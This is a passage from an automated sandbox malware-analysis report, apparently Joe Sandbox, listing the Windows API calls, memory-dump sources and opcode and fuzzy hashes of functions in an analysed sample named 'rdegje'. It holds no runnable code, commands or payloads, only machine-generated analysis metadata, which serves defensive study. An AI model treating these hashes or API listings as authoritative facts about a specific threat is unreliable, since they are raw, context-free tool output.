                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: String
                    • String ID: LCMapStringEx
                    • API String ID: 2568140703-3893581201
                    • Opcode ID: 8f7119dcbeecf6cef2d60fa1fcb6c911c961cab25fcc86a49ca3f031ef89b833
                    • Instruction ID: 687962bd7f4687cfd0cf6b61af68f562efac56f649dfb564056f3ed53f833915
                    • Opcode Fuzzy Hash: 8f7119dcbeecf6cef2d60fa1fcb6c911c961cab25fcc86a49ca3f031ef89b833
                    • Instruction Fuzzy Hash: D301133260120CBBCF02AF90DD01DEE3FA2EB08760F555115FF08261A1CB369971BB81
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00EFB72F), ref: 00EFC115
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: CountCriticalInitializeSectionSpin
                    • String ID: InitializeCriticalSectionEx
                    • API String ID: 2593887523-3084827643
                    • Opcode ID: af2d00324fbf302409f283294d2f4ad01391cf47656aed46079dd260f2173ad8
                    • Instruction ID: 1f82569d71ad1ebb993aa9d1536ba2f6b802d8914156f443a53633bb9c5995bd
                    • Opcode Fuzzy Hash: af2d00324fbf302409f283294d2f4ad01391cf47656aed46079dd260f2173ad8
                    • Instruction Fuzzy Hash: 3EF0BE71B4121CBBCB11AF50CD06CAE7FA1EB187A0B505025FE096A2A1CF769D21BB81
                    APIs
                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00ED7ED0,?,?,?,00000000), ref: 00EDB04C
                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00EDB100
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: File$BuffersFlushTime
                    • String ID:
                    • API String ID: 1392018926-0
                    • Opcode ID: 4818617c38d5f53217332a4a3b5411f368e5afc41656e61d64065828d9cafa3c
                    • Instruction ID: 28f8d02f3a3be367f612ca27870367002328a32101e5d3e080f68bb5c986bbc1
                    • Opcode Fuzzy Hash: 4818617c38d5f53217332a4a3b5411f368e5afc41656e61d64065828d9cafa3c
                    • Instruction Fuzzy Hash: FE213631248245DFC710DE35C491AABBBE8EF51308F05191EF4E093251E72AE90DDB62
                    APIs
                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00EDB157
                    • GetLastError.KERNEL32 ref: 00EDB164
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: 200a91f9195eb6162e47a0b62b640a02c2cfa8877c84918f2c3aaeb91b8dc188
                    • Instruction ID: fc73ad0f600e7a34b7e3aca62dfc98c82cac8fb3f96ba554cdbf9b9a5d1f4cab
                    • Opcode Fuzzy Hash: 200a91f9195eb6162e47a0b62b640a02c2cfa8877c84918f2c3aaeb91b8dc188
                    • Instruction Fuzzy Hash: F311CE31601710EBD7259A28C854BA6B3E9FB04364F61576AE1A2B33D0F770AD46D650
                    APIs
                    • _swprintf.LIBCMT ref: 00EEF02C
                      • Part of subcall function 00ED4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED4A33
                    • SetDlgItemTextW.USER32(00000065,?), ref: 00EEF043
                      • Part of subcall function 00EEC758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EEC769
                      • Part of subcall function 00EEC758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEC77A
                      • Part of subcall function 00EEC758: IsDialogMessageW.USER32(00050456,?), ref: 00EEC78E
                      • Part of subcall function 00EEC758: TranslateMessage.USER32(?), ref: 00EEC79C
                      • Part of subcall function 00EEC758: DispatchMessageW.USER32(?), ref: 00EEC7A6
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                    • String ID:
                    • API String ID: 2718869927-0
                    • Opcode ID: 4e9ef2761bd40f52448ca16447750f6d54ffa133b5ed078ad18afb7dde1c863e
                    • Instruction ID: d1002d0dec1e88aafaeee8d795f5b9cbdcf1f56d09c3145b9ea7f2bfb9fbe820
                    • Opcode Fuzzy Hash: 4e9ef2761bd40f52448ca16447750f6d54ffa133b5ed078ad18afb7dde1c863e
                    • Instruction Fuzzy Hash: 25E0227680428C36DF01A7A1EC0AFEA3AECAB04389F041462B201A60B2D6B486119B62
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: ItemShowWindow
                    • String ID:
                    • API String ID: 3351165006-0
                    • Opcode ID: 3136d8e5b6fbfb873436447812b9c83187c64a8ce3693bc0d340cde8013d55b2
                    • Instruction ID: 398b492aa6a39a332a1d7e88dec60f9f63188c8cbd1f5ce09017651bba62acd8
                    • Opcode Fuzzy Hash: 3136d8e5b6fbfb873436447812b9c83187c64a8ce3693bc0d340cde8013d55b2
                    • Instruction Fuzzy Hash: E3C01232058604BECB011B70DC09D2E7BA9ABD4621F10C904F0A5C1060C239C010EB11
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: ea6e9b1c3a1fb247ad26643c7ceabbdd3486cf6dc3789263f07eeea9248ac35f
                    • Instruction ID: 36665e82c1fc078de74984cc65daa68d183ac7ee3b9c6e684aab38b5cbf4d79c
                    • Opcode Fuzzy Hash: ea6e9b1c3a1fb247ad26643c7ceabbdd3486cf6dc3789263f07eeea9248ac35f
                    • Instruction Fuzzy Hash: 6371B0B1504B859FCB25EB74D851AE7B7E8FF25300F04296FA2AB62281DB707645CB11
                    APIs
                    • __EH_prolog.LIBCMT ref: 00ED90A7
                      • Part of subcall function 00ED13F8: __EH_prolog.LIBCMT ref: 00ED13FD
                      • Part of subcall function 00ED2032: __EH_prolog.LIBCMT ref: 00ED2037
                      • Part of subcall function 00EDB966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00EDB991
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: H_prolog$CloseFind
                    • String ID:
                    • API String ID: 2506663941-0
                    • Opcode ID: 2af5ab8a6509ae8f1bb1c18ce0c4ce457709005154cff0383158164f65a141bf
                    • Instruction ID: 9a794eb72db1196b19c28bb7020356d1573f3a3e2e8448f6c97fb1a0aba66a35
                    • Opcode Fuzzy Hash: 2af5ab8a6509ae8f1bb1c18ce0c4ce457709005154cff0383158164f65a141bf
                    • Instruction Fuzzy Hash: 1841A271904258AADB24DB60CCA5AEA73B9EF10344F0410EBE18A73293DB755F8ACF10
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EFA543,00000001,00000364,?,00EF53FD,?,?,00F130C4), ref: 00EFC337
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 171d7628afd674fea46deb10d523993eceb63588e53ece3a2cf22b7c854b80c0
                    • Instruction ID: 22e6ac466b9800ca270ec334c06fc1d489111dd11307be89d1fb8c5226b43e59
                    • Opcode Fuzzy Hash: 171d7628afd674fea46deb10d523993eceb63588e53ece3a2cf22b7c854b80c0
                    • Instruction Fuzzy Hash: D6F0BB3160612CA6DB211A25DF01AB637889F817E1B34E091AA09FB090DA30D90095E1
                    APIs
                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00EE215D
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: ExecutionStateThread
                    • String ID:
                    • API String ID: 2211380416-0
                    • Opcode ID: a6314c18d5bdca4da2677537508ef7aba1785a73516202e3082c14c30a75d659
                    • Instruction ID: 89fe1a4f6c2fe1e1c2fb2e28f8a6e488293e90a0e4288780ef1a20bf5d53ec57
                    • Opcode Fuzzy Hash: a6314c18d5bdca4da2677537508ef7aba1785a73516202e3082c14c30a75d659
                    • Instruction Fuzzy Hash: 35D0C2006050A412DB123B3928057FD2ACE9FC6368F0910ABB30A722938B540943A2B1
                    APIs
                    • SetEndOfFile.KERNELBASE(?,00EDA083,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,00ED922F,-00008BE0), ref: 00EDB19C
                    Memory Dump Source
                    • Source File: 00000006.00000002.1947872026.0000000000ED1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00ED0000, based on PE: true
                    • Associated: 00000006.00000002.1947841560.0000000000ED0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F10000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F17000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948095702.0000000000F34000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000006.00000002.1948180548.0000000000F35000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_ed0000_rdegje.jbxd
                    Similarity
                    • API ID: File
                    • String ID:
                    • API String ID: 749574446-0
                    • Opcode ID: ad7eb83f6d2d82b8e7f5d7b0ee973ae560e4f04b0dabb71402a49d295e270195
                    • Instruction ID: b05fccd1ecca9d1bf7e1a7c054de30b5e5ee1b713f8db12b479244fba1122191
                    • Opcode Fuzzy Hash: ad7eb83f6d2d82b8e7f5d7b0ee973ae560e4f04b0dabb71402a49d295e270195
                    • Instruction Fuzzy Hash: DBA0223008000E8BCE002B30EE0800E3B20FB20BC030002E8A22BCF0B2CB23880BEB00